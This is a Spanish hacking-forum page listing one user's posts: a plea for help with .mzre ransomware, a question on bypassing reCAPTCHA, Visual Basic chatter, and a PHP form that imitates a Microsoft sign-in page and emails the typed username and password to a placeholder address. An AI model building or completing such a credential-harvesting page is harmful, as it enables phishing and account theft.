elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Análisis y Diseño de Malware / Re: MALWARE .MZRE en: 5 Octubre 2023, 18:29 pm
Hola, ingresa aquí y verifica si podes identificar ese tipo de ransomware:

https://forospyware.com/t/id-ransomware-%C2%BFc%C3%B3mo-identificar-el-ransomware-que-lo-ha-infectado/1378

Nos comentas las novedades.


Saludos

Estimado comparto los resultados



luego de ello descargue la herramienta stop djvu como resultado



no logra descifrar los archivos y quitarles la extension .MZRE

2  Seguridad Informática / Análisis y Diseño de Malware / Re: MALWARE .MZRE en: 4 Octubre 2023, 14:23 pm
Este malware se le conoce como Ransomware.
Que medidas has tomado?
Sistema operativo?
Copias de seguridad?

Use gridinsoft anti-malware para eliminarlo. windows 10 no tengo copia de seguridad

al parecer ya se ha eliminado el ransomware pero no puedo recuperar mis archivos con extension .mzre

he usado descifradores como Stop/djvu sin exito
3  Seguridad Informática / Análisis y Diseño de Malware / MALWARE .MZRE en: 4 Octubre 2023, 01:42 am
como estan? hace unos dias quede contaminado con un malware el q me cambio todas las extensiones de mis archivos agregandole al final .mzre

ejemplo: imagen1.jpg.mzre

he buscado sugerencias para eliminar el malware sin exito y tambien me gustaria ver la manera y opcion donde se pueda restablecer las extensiones y poder usar nuevamente los archivos.

agradeciendo la informacion que me puedan brindar
4  Programación / Desarrollo Web / ReCaptcha en: 9 Mayo 2016, 15:06 pm
Buenas compañeros quisiera saber si hay alguna manera de completar los recaptchas de google de manera automática  o si hay probabilidades de evitarlos o desactivarlos de una pagina web.

5  Programación / PHP / Ayuda envio formulario php! en: 9 Septiembre 2009, 02:18 am
Necesito ayuda deseo hacer envio de datos al correo electronico, las variables nunca se envian con los datos que cargo en los input quisiera que me ayudaran estoy novato en php, no se si se crean 2 paginas una html y php o en una sola php se puede hacer eso ayudenme a ver donde tengo el error

este es el code:

Citar
<html>
<head>
<meta>
<title>Untitled Document</title>
</head>
<body>
<form name='formulario' id='formulario' method='post' action='formsolo.php' target='_self'>

 <tr><td valign="top" class="css0059" align="right"><label for="i0116">Dirección de correo electrónico:</label></td><td valign="top" class="css0093">
<p><input name="usuario" id="usuario" type="text" maxlength="113" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p>
  <tr><td valign="top" class="css0059" align="right"><label for="i0118">Contraseña:</label></td><td valign="top" class="css0093">

  <p><input name="clave" type="password" maxlength="16" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p>
<input name='submit' type="submit" value="    Iniciar sesión    " class="css0088"  />
</form>


<?php

   $to = "corrreo@dominio.com";
   $subject = "Probando envio datos"; 
   $usuario = "Usuario: " . $_POST['usuario'] . "\n";
   $clave = "Clave: " . $_POST['clave'] . "\n";
 
   mail($to, $subject, $usuario, $clave);
   
?>
</body>
</html>

actualemte estoy usando este servidor gratuito el cual me da email para hacer las pruebas. espero su ayuda gracias!!  ;D
6  Programación / Programación Visual Basic / Re: Visual Studio 6.0 Español [GIG][2 LINKs] en: 5 Mayo 2008, 19:08 pm
Error en la descarga
El archivo ha sido borrado  :¬¬

esto es lo q dice gigasize, si puedes sube de nuevo el archivo
7  Programación / Programación Visual Basic / Re: Todo sobre las API´s para Windows en vb 6 o anteriores. en: 15 Noviembre 2007, 17:50 pm
gracias por la pagina voy a imprimir la info para leerla mejor 
8  Media / Diseño Gráfico / Re: Photoshop Tutorial: Crear una cinta de celofan en: 24 Mayo 2006, 19:14 pm
muy bueno el tuto gracias por la informacion
9  Programación / Programación Visual Basic / abrir un html en: 27 Marzo 2006, 22:04 pm
Quisiera saber como hago para q un boton o dentro de un form salga un documento html??

Como hacer q al maximizar un form todos sus botones textboxs, etc tambien se maximizen??
10  Programación / Programación Visual Basic / Re: Crear .dll en: 22 Marzo 2006, 15:40 pm
no es precisamente de CS yo diria q para cualquier juego q se vea pantalla completa

alguien q tenga un codigo parecido a ver si me sirve de ayuda
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines